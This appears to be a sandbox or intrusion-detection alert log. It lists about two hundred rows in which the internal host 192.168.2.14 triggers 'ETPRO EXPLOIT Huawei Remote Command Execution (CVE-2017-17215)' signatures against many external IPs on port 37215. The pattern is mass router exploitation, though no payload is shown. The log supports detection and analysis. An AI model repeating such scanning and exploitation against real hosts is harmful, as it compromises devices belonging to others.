                                                    07/10/24-08:26:29.773841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301837215192.168.2.14197.22.120.185
                                                    07/10/24-08:26:55.438982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096637215192.168.2.1441.195.11.46
                                                    07/10/24-08:27:08.364400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073037215192.168.2.14157.204.179.137
                                                    07/10/24-08:26:59.538381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100637215192.168.2.14197.30.27.28
                                                    07/10/24-08:27:33.962106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975637215192.168.2.14197.247.125.211
                                                    07/10/24-08:26:43.527873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451437215192.168.2.14157.37.227.59
                                                    07/10/24-08:27:27.130427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430237215192.168.2.14197.220.177.135
                                                    07/10/24-08:26:41.578531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425037215192.168.2.1441.193.217.183
                                                    07/10/24-08:27:10.558738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430237215192.168.2.14182.85.227.27
                                                    07/10/24-08:27:14.793523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474237215192.168.2.14157.200.143.145
                                                    07/10/24-08:26:59.634002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775037215192.168.2.1441.22.62.178
                                                    07/10/24-08:26:59.800330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085037215192.168.2.14197.210.6.192
                                                    07/10/24-08:26:14.810529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636637215192.168.2.14197.29.76.98
                                                    07/10/24-08:26:52.015024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721037215192.168.2.1441.32.184.236
                                                    07/10/24-08:26:28.938388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397237215192.168.2.14157.121.162.149
                                                    07/10/24-08:26:14.828942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485637215192.168.2.14197.166.3.210
                                                    07/10/24-08:26:15.872780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917637215192.168.2.14118.177.188.244
                                                    07/10/24-08:26:23.304428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097237215192.168.2.14197.135.3.202
                                                    07/10/24-08:27:30.560872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447837215192.168.2.1420.112.24.158
                                                    07/10/24-08:27:33.907935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587637215192.168.2.14197.133.251.215
                                                    07/10/24-08:26:29.784523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558637215192.168.2.14197.100.60.197
                                                    07/10/24-08:26:43.667979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672837215192.168.2.14197.1.173.208
                                                    07/10/24-08:26:28.763901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783237215192.168.2.1441.220.104.40
                                                    07/10/24-08:26:38.599801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596037215192.168.2.1441.7.81.221
                                                    07/10/24-08:26:13.645401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814637215192.168.2.14157.164.16.157
                                                    07/10/24-08:26:26.600154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4393837215192.168.2.1441.42.118.66
                                                    07/10/24-08:26:41.430754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438637215192.168.2.1441.87.222.135
                                                    07/10/24-08:26:49.867882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161437215192.168.2.1441.25.178.81
                                                    07/10/24-08:26:38.552864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865037215192.168.2.14197.67.117.194
                                                    07/10/24-08:26:41.334233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490437215192.168.2.14157.246.113.13
                                                    07/10/24-08:27:27.139115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879637215192.168.2.14190.45.38.178
                                                    07/10/24-08:26:14.732567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816837215192.168.2.14151.244.197.226
                                                    07/10/24-08:26:52.029476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775637215192.168.2.14157.192.51.38
                                                    07/10/24-08:27:08.448133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4646437215192.168.2.14105.216.75.77
                                                    07/10/24-08:26:57.586022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030437215192.168.2.14197.199.11.127
                                                    07/10/24-08:27:23.497299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115837215192.168.2.1441.130.233.218
                                                    07/10/24-08:27:07.310052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401237215192.168.2.1441.197.6.192
                                                    07/10/24-08:26:17.939708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265837215192.168.2.14157.204.47.255
                                                    07/10/24-08:26:13.778928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178037215192.168.2.1441.11.106.64
                                                    07/10/24-08:27:32.545820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341237215192.168.2.1441.189.22.41
                                                    07/10/24-08:26:47.789703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669037215192.168.2.1475.161.162.225
                                                    07/10/24-08:26:59.812125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796837215192.168.2.1484.133.99.35
                                                    07/10/24-08:27:10.672315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715237215192.168.2.1425.23.166.240
                                                    07/10/24-08:26:28.696210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654437215192.168.2.14197.132.204.252
                                                    07/10/24-08:26:14.824787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.14197.251.59.186
                                                    07/10/24-08:26:59.831148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802037215192.168.2.14157.159.201.81
                                                    07/10/24-08:27:19.290152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021837215192.168.2.1441.111.162.34
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200837215192.168.2.14197.240.154.24
                                                    07/10/24-08:26:11.572595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815237215192.168.2.14197.124.185.106
                                                    07/10/24-08:26:28.739643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000637215192.168.2.1441.46.100.167
                                                    07/10/24-08:27:20.437179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554037215192.168.2.1464.54.249.50
                                                    07/10/24-08:26:28.651021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306237215192.168.2.14197.59.79.74
                                                    07/10/24-08:27:17.014699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835037215192.168.2.1441.156.112.12
                                                    07/10/24-08:27:10.632992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376637215192.168.2.14157.213.45.248
                                                    07/10/24-08:26:29.813463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593437215192.168.2.14157.59.165.226
                                                    07/10/24-08:26:28.766968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545837215192.168.2.14197.75.9.44
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682037215192.168.2.14197.37.89.209
                                                    07/10/24-08:27:05.145286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819037215192.168.2.1441.37.9.106
                                                    07/10/24-08:27:30.458170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132837215192.168.2.14197.135.76.32
                                                    07/10/24-08:27:05.083830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432037215192.168.2.14157.86.214.140
                                                    07/10/24-08:27:24.970396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175837215192.168.2.1486.86.255.130
                                                    07/10/24-08:27:08.415966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.14197.62.63.118
                                                    07/10/24-08:26:18.025599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275437215192.168.2.1441.104.43.88
                                                    07/10/24-08:26:23.305331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708237215192.168.2.14197.185.119.7
                                                    07/10/24-08:26:53.127595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717037215192.168.2.14157.96.114.235
                                                    07/10/24-08:26:28.819070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439637215192.168.2.14136.203.204.171
                                                    07/10/24-08:26:36.415426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130837215192.168.2.14197.4.254.3
                                                    07/10/24-08:26:15.875738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130637215192.168.2.1465.100.54.89
                                                    07/10/24-08:26:20.116732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856037215192.168.2.14124.177.200.101
                                                    07/10/24-08:26:38.616347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669837215192.168.2.14157.141.48.60
                                                    07/10/24-08:26:22.216142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966237215192.168.2.14157.78.109.212
                                                    07/10/24-08:27:02.696239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261837215192.168.2.14121.179.198.130
                                                    07/10/24-08:27:13.857509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034837215192.168.2.1446.133.126.23
                                                    07/10/24-08:26:36.399838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152237215192.168.2.1441.54.118.118
                                                    07/10/24-08:26:59.584136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.14197.51.28.110
                                                    07/10/24-08:26:59.686618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847637215192.168.2.14157.246.147.226
                                                    07/10/24-08:27:30.522547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024437215192.168.2.14157.3.234.37
                                                    07/10/24-08:26:34.234468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492837215192.168.2.14157.41.75.31
                                                    07/10/24-08:26:47.953099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147237215192.168.2.14157.143.175.6
                                                    07/10/24-08:26:57.644926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842237215192.168.2.14157.41.29.176
                                                    07/10/24-08:27:23.968109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379837215192.168.2.14157.231.43.13
                                                    07/10/24-08:26:42.404387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493637215192.168.2.1441.4.108.235
                                                    07/10/24-08:26:38.614472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541037215192.168.2.1476.86.231.5
                                                    07/10/24-08:26:57.647317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902637215192.168.2.14197.210.103.65
                                                    07/10/24-08:27:13.993743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859637215192.168.2.1436.100.82.197
                                                    07/10/24-08:26:51.996552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846837215192.168.2.14157.101.37.103
                                                    07/10/24-08:26:52.039541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663837215192.168.2.14133.90.113.202
                                                    07/10/24-08:27:02.891587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576637215192.168.2.1438.95.188.64
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638037215192.168.2.1441.115.101.254
                                                    07/10/24-08:26:15.878157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858637215192.168.2.14157.19.111.143
                                                    07/10/24-08:26:41.507922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824437215192.168.2.14157.19.221.167
                                                    07/10/24-08:27:33.894424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700037215192.168.2.14207.77.227.97
                                                    07/10/24-08:26:23.315814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834437215192.168.2.14197.217.46.82
                                                    07/10/24-08:26:38.621748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125237215192.168.2.14157.146.16.181
                                                    07/10/24-08:26:45.651958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885237215192.168.2.14197.120.35.40
                                                    07/10/24-08:26:41.559243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957837215192.168.2.145.172.10.251
                                                    07/10/24-08:27:32.561309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887837215192.168.2.1441.232.57.136
                                                    07/10/24-08:26:34.267264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756037215192.168.2.1441.225.154.175
                                                    07/10/24-08:26:42.370948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752037215192.168.2.1490.105.109.67
                                                    07/10/24-08:26:38.565170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652037215192.168.2.1441.254.247.179
                                                    07/10/24-08:26:23.350538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152237215192.168.2.14157.43.113.197
                                                    07/10/24-08:26:36.330263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259037215192.168.2.1440.211.28.52
                                                    07/10/24-08:26:49.802589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.1473.28.253.141
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401237215192.168.2.1441.73.96.134
                                                    07/10/24-08:26:38.533121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720837215192.168.2.14157.185.58.172
                                                    07/10/24-08:26:52.069445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052437215192.168.2.1441.11.170.173
                                                    07/10/24-08:26:57.564039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557037215192.168.2.14135.86.212.35
                                                    07/10/24-08:27:02.834803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426837215192.168.2.1442.155.202.47
                                                    07/10/24-08:27:28.169607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153437215192.168.2.14102.66.138.160
                                                    07/10/24-08:27:02.992532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704837215192.168.2.14197.63.51.32
                                                    07/10/24-08:27:23.864190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048637215192.168.2.1441.74.70.173
                                                    07/10/24-08:27:33.881615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346637215192.168.2.14197.195.61.43
                                                    07/10/24-08:26:45.609281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692237215192.168.2.14157.247.158.210
                                                    07/10/24-08:27:07.292133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701837215192.168.2.14121.16.72.208
                                                    07/10/24-08:26:14.828226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619237215192.168.2.14212.199.254.32
                                                    07/10/24-08:26:29.860870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964637215192.168.2.14157.10.40.168
                                                    07/10/24-08:27:20.471536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248237215192.168.2.14157.58.195.91
                                                    07/10/24-08:26:43.763647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019237215192.168.2.14151.8.133.181
                                                    07/10/24-08:26:48.019858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616037215192.168.2.14157.244.140.93
                                                    07/10/24-08:26:20.136033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14154.249.50.153
                                                    07/10/24-08:27:14.017710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937637215192.168.2.14157.246.158.44
                                                    07/10/24-08:27:19.246570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465637215192.168.2.1441.249.197.210
                                                    07/10/24-08:26:13.776398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14187.145.136.229
                                                    07/10/24-08:26:15.790225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025437215192.168.2.14157.42.184.41
                                                    07/10/24-08:26:43.542796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093637215192.168.2.1441.143.95.129
                                                    07/10/24-08:27:13.991583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.1441.19.13.33
                                                    07/10/24-08:26:13.768963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003037215192.168.2.1441.228.77.48
                                                    07/10/24-08:27:22.890637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295637215192.168.2.1441.126.38.27
                                                    07/10/24-08:26:31.067325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.1450.144.20.191
                                                    07/10/24-08:26:31.098599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409237215192.168.2.14211.93.202.125
                                                    07/10/24-08:26:57.505236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593837215192.168.2.1441.179.24.126
                                                    07/10/24-08:27:11.506904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355837215192.168.2.14207.170.66.244
                                                    07/10/24-08:26:55.415648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154437215192.168.2.1441.63.59.40
                                                    07/10/24-08:26:47.827027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208237215192.168.2.1441.226.243.187
                                                    07/10/24-08:26:36.422019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961637215192.168.2.14197.136.173.146
                                                    07/10/24-08:27:02.906092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057437215192.168.2.1441.188.170.148
                                                    07/10/24-08:27:17.034414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000237215192.168.2.1441.227.191.192
                                                    07/10/24-08:27:33.744457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482037215192.168.2.14217.72.193.11
                                                    07/10/24-08:26:15.854117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491837215192.168.2.14197.249.124.83
                                                    07/10/24-08:26:49.851940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847437215192.168.2.14157.198.8.47
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199437215192.168.2.14197.83.110.213
                                                    07/10/24-08:26:43.836589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601237215192.168.2.14197.51.102.115
                                                    07/10/24-08:26:29.842951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701837215192.168.2.1441.246.45.174
                                                    07/10/24-08:26:28.879483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395237215192.168.2.14157.95.120.98
                                                    07/10/24-08:27:02.986988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658237215192.168.2.14157.209.109.125
                                                    07/10/24-08:27:05.111277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433837215192.168.2.14197.98.185.168
                                                    07/10/24-08:27:02.772375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881237215192.168.2.148.213.96.54
                                                    07/10/24-08:27:19.230010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481437215192.168.2.1438.172.199.161
                                                    07/10/24-08:27:05.163542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681637215192.168.2.14173.178.255.30
                                                    07/10/24-08:27:30.510800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812837215192.168.2.14157.8.176.43
                                                    07/10/24-08:26:38.552864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446237215192.168.2.14157.155.38.214
                                                    07/10/24-08:27:19.276422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958237215192.168.2.1452.174.206.170
                                                    07/10/24-08:27:05.164336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100437215192.168.2.1465.211.15.131
                                                    07/10/24-08:27:17.091838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433837215192.168.2.14157.93.43.69
                                                    07/10/24-08:27:13.750468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203037215192.168.2.1432.182.231.23
                                                    07/10/24-08:27:17.005149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329637215192.168.2.14157.106.230.182
                                                    07/10/24-08:26:43.695962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715637215192.168.2.1441.4.145.109
                                                    07/10/24-08:27:17.013307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.1441.174.138.244
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345637215192.168.2.14125.150.217.180
                                                    07/10/24-08:26:26.547327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506837215192.168.2.14157.177.220.239
                                                    07/10/24-08:27:33.832260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705237215192.168.2.14197.123.170.66
                                                    07/10/24-08:26:59.848554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486637215192.168.2.14150.33.79.214
                                                    07/10/24-08:27:32.621614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.14197.75.151.213
                                                    07/10/24-08:27:23.888639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358237215192.168.2.1441.86.2.138
                                                    07/10/24-08:26:28.834790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566837215192.168.2.1495.238.112.52
                                                    07/10/24-08:26:22.284234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584237215192.168.2.14157.251.155.112
                                                    07/10/24-08:26:43.551823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707037215192.168.2.14194.193.51.28
                                                    07/10/24-08:26:45.616185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439637215192.168.2.14197.186.138.87
                                                    07/10/24-08:26:43.651509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.14157.59.117.99
                                                    07/10/24-08:26:25.481864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882237215192.168.2.14157.193.1.42
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636237215192.168.2.14157.68.42.23
                                                    07/10/24-08:27:03.030502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044037215192.168.2.14157.65.11.228
                                                    07/10/24-08:26:28.923936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441637215192.168.2.1441.174.30.131
                                                    07/10/24-08:26:31.081950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313637215192.168.2.1441.10.86.125
                                                    07/10/24-08:27:13.829336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606437215192.168.2.14197.151.212.62
                                                    07/10/24-08:26:22.298468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262837215192.168.2.14159.246.131.186
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602837215192.168.2.1441.5.185.230
                                                    07/10/24-08:26:49.834226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434037215192.168.2.14195.19.48.178
                                                    07/10/24-08:26:13.647061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337837215192.168.2.1441.77.33.193
                                                    07/10/24-08:27:08.323465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725237215192.168.2.14157.68.35.98
                                                    07/10/24-08:26:11.452655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909037215192.168.2.1446.225.21.207
                                                    07/10/24-08:26:31.072857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599437215192.168.2.1441.11.78.150
                                                    07/10/24-08:26:49.796978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303037215192.168.2.14157.152.211.43
                                                    07/10/24-08:27:30.468410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606237215192.168.2.14197.141.54.149
                                                    07/10/24-08:26:28.897844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074637215192.168.2.14200.71.233.67
                                                    07/10/24-08:26:17.951763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142637215192.168.2.1485.196.232.76
